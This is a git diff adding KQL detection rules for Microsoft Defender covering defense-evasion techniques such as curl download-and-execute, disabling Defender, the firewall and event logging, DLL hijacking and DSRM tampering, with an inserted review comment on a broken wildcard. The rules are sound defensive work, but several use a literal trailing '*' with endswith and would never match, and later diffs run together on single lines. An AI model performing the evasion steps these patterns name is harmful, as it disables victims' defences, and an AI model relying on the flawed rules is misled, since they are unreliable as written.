+| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
new file mode 100644
index 00000000..42e0e821
--- /dev/null
+++ b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
@@ -0,0 +1,12 @@
+// Title: Creation Of Non-Existent System DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
+// Date: 2022-12-01
+// Level: medium
+// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
+Usually this technique is used to achieve DLL hijacking.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql
new file mode 100644
index 00000000..fc6c6297
--- /dev/null
+++ b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql
@@ -0,0 +1,10 @@
+// Title: Curl Download And Execute Combination
+// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-01-13
+// Level: high
+// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql
new file mode 100644
index 00000000..875b8de9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Custom File Open Handler Executes PowerShell
+// Author: CD_R0M_
+// Date: 2022-06-11
+// Level: high
+// Description: Detects the abuse of custom file open handler, executing powershell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey endswith "shell\\open\\command*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql
new file mode 100644
index 00000000..8285cc90
--- /dev/null
+++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql
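Review bot: In the Custom File Open Handler rule, `RegistryKey endswith "shell\\open\\command*"` requires the key name to literally end in an asterisk — `endswith` does not interpret `*` — so the rule only fires on a key actually called `command*` and never on the real `...\shell\open\command` handler keys. Drop the wildcard: `| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey contains "\\shell\\open\\command"` (use `endswith "\\shell\\open\\command"` if only writes to that key's own values should count). The same literal `*` appears in the Winevt ChannelAccess rule in this commit, so the backend's rendering of trailing wildcards is worth fixing at the source rather than per file.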
@@ -0,0 +1,12 @@ +// Title: Decode Base64 Encoded Text +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where ProcessCommandLine contains "-d" and FolderPath endswith "/base64" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql new file mode 100644 index 00000000..305525e0 --- /dev/null +++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql @@ -0,0 +1,12 @@ +// Title: Decode Base64 Encoded Text -MacOs +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where ProcessCommandLine contains "-d" and FolderPath =~ "/usr/bin/base64" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql new file mode 100644 index 00000000..7598c0bf --- /dev/null +++ b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql 
@@ -0,0 +1,12 @@ +// Title: Delete Defender Scan ShellEx Context Menu Registry Key +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: medium +// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely as this weakens defenses and normally would not be done even if using another AV. + +DeviceRegistryEvents +| where RegistryKey contains "shellex\\ContextMenuHandlers\\EPP" and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql new file mode 100644 index 00000000..938e10c9 --- /dev/null +++ b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql @@ -0,0 +1,13 @@ +// Title: DeviceCredentialDeployment Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\DeviceCredentialDeployment.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql new file mode 100644 index 00000000..f4b9513a --- /dev/null 
+++ b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql @@ -0,0 +1,12 @@ +// Title: Devtoolslauncher.exe Executes Specified Binary +// Author: Beyu Denis, oscd.community (rule), @_felamos (idea) +// Date: 2019-10-12 +// Level: high +// Description: The Devtoolslauncher.exe executes other binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use of devtoolslauncher.exe by legitimate user + +DeviceProcessEvents +| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql new file mode 100644 index 00000000..c691ea5e --- /dev/null +++ b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql @@ -0,0 +1,10 @@ +// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE +// Author: Greg (rule) +// Date: 2022-06-17 +// Level: high +// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190 + +DeviceImageLoadEvents +| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql new file mode 100644 index 00000000..0705d2cf --- /dev/null +++ b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql 
@@ -0,0 +1,14 @@ +// Title: Directory Removal Via Rmdir +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "rmdir" command in order to delete directories. +Adversaries may delete files left behind by the actions of their intrusion activity. +Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql new file mode 100644 index 00000000..969916f8 --- /dev/null +++ b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql 
@@ -0,0 +1,16 @@ +// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering +// Author: Nischal Khadgi +// Date: 2024-07-11 +// Level: high +// Description: Detects changes to "DsrmAdminLogonBehavior" registry value. +During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. +Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. +If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. +If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. +If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Control\\Lsa\\DsrmAdminLogonBehavior" and (not(RegistryValueData =~ "DWORD (0x00000000)")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql new file mode 100644 index 00000000..acdb950c --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql 
@@ -0,0 +1,10 @@ +// Title: Disable Administrative Share Creation at Startup +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.005 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\LanmanServer\\Parameters*" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql new file mode 100644 index 00000000..98c891e0 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql @@ -0,0 +1,10 @@ +// Title: Disable Exploit Guard Network Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: medium +// Description: Detects disabling Windows Defender Exploit Guard Network Protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql new file mode 100644 index 00000000..557ba58a --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql 
@@ -0,0 +1,10 @@ +// Title: Disable Macro Runtime Scan Scope +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-25 +// Level: high +// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE*" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql new file mode 100644 index 00000000..13fdd341 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql @@ -0,0 +1,10 @@ +// Title: Disable Microsoft Defender Firewall via Registry +// Author: frack113 +// Date: 2022-01-09 +// Level: medium +// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\SharedAccess\\Parameters\\FirewallPolicy*" and RegistryKey endswith "\\EnableFirewall" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_or_stop_services.kql b/KQL/rules/Defense Evasion/disable_or_stop_services.kql new file mode 100644 index 00000000..05d94219 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_or_stop_services.kql 
@@ -0,0 +1,12 @@ +// Title: Disable Or Stop Services +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "stop" or ProcessCommandLine contains "disable") and (FolderPath endswith "/service" or FolderPath endswith "/systemctl" or FolderPath endswith "/chkconfig") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql new file mode 100644 index 00000000..287d5e1d --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql @@ -0,0 +1,12 @@ +// Title: Disable Privacy Settings Experience in Registry +// Author: frack113 +// Date: 2022-10-02 +// Level: medium +// Description: Detects registry modifications that disable Privacy Settings Experience +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql new file mode 100644 index 00000000..139d72bb --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql 
@@ -0,0 +1,10 @@ +// Title: Disable PUA Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: high +// Description: Detects disabling Windows Defender PUA protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_security_tools.kql b/KQL/rules/Defense Evasion/disable_security_tools.kql new file mode 100644 index 00000000..a37b7aed --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_security_tools.kql 
@@ -0,0 +1,12 @@ +// Title: Disable Security Tools +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "unload" and FolderPath =~ "/bin/launchctl") and (ProcessCommandLine contains "com.objective-see.lulu.plist" or ProcessCommandLine contains "com.objective-see.blockblock.plist" or ProcessCommandLine contains "com.google.santad.plist" or ProcessCommandLine contains "com.carbonblack.defense.daemon.plist" or ProcessCommandLine contains "com.carbonblack.daemon.plist" or ProcessCommandLine contains "at.obdev.littlesnitchd.plist" or ProcessCommandLine contains "com.tenablesecurity.nessusagent.plist" or ProcessCommandLine contains "com.opendns.osx.RoamingClientConfigUpdater.plist" or ProcessCommandLine contains "com.crowdstrike.falcond.plist" or ProcessCommandLine contains "com.crowdstrike.userdaemon.plist" or ProcessCommandLine contains "osquery" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "td-agent")) or (ProcessCommandLine contains "disable" and FolderPath =~ "/usr/sbin/spctl") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql new file mode 100644 index 00000000..06ad0973 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql 
@@ -0,0 +1,10 @@ +// Title: Disable Tamper Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: medium +// Description: Detects disabling Windows Defender Tamper Protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql new file mode 100644 index 00000000..751507f4 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql 
@@ -0,0 +1,12 @@ +// Title: Disable Windows Defender AV Security Monitoring +// Author: ok @securonix invrep-de, oscd.community, frack113 +// Date: 2020-10-12 +// Level: high +// Description: Detects attackers attempting to disable Windows Defender using Powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. + +DeviceProcessEvents +| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql new file mode 100644 index 00000000..b11de363 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql 
@@ -0,0 +1,13 @@ +// Title: Disable Windows Defender Functionalities Via Registry Keys +// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel +// Date: 2022-08-01 +// Level: high +// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions via the Windows Defender interface +// - Third party Antivirus + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows Defender*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\DisableBehaviorMonitoring" or RegistryKey endswith "\\DisableBlockAtFirstSeen" or RegistryKey endswith "\\DisableEnhancedNotifications" or RegistryKey endswith "\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\DisableIOAVProtection" or RegistryKey endswith "\\DisableOnAccessProtection" or RegistryKey endswith "\\DisableRealtimeMonitoring" or RegistryKey endswith "\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\DisableScriptScanning"))) and 
(not((InitiatingProcessFolderPath endswith "\\sepWscSvc64.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql new file mode 100644 index 00000000..e357894c --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql 
@@ -0,0 +1,12 @@ +// Title: Disable Windows Event Logging Via Registry +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-04 +// Level: high +// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational*")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql new file mode 100644 index 00000000..ba01e570 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql @@ -0,0 +1,10 @@ +// Title: Disable Windows Firewall by Registry +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set EnableFirewall to 0 to disable the Windows firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql new file mode 100644 index 00000000..75cd9ac3 --- /dev/null +++ b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql @@ -0,0 +1,10 @@ +// Title: Disable Windows IIS HTTP Logging +// Author: frack113 +// Date: 2022-01-09 +// Level: high +// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql new file mode 100644 index 00000000..9e582b93 
--- /dev/null +++ b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql @@ -0,0 +1,10 @@ +// Title: Disabled IE Security Features +// Author: Florian Roth (Nextron Systems) +// Date: 2020-06-19 +// Level: high +// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql new file mode 100644 index 00000000..943826de --- /dev/null +++ b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql @@ -0,0 +1,12 @@ +// Title: Disabled Volume Snapshots +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-28 +// Level: high +// Description: Detects commands that temporarily turn off Volume Snapshots +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration + +DeviceProcessEvents +| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql new file mode 100644 index 00000000..557e0e64 --- /dev/null +++ b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql 
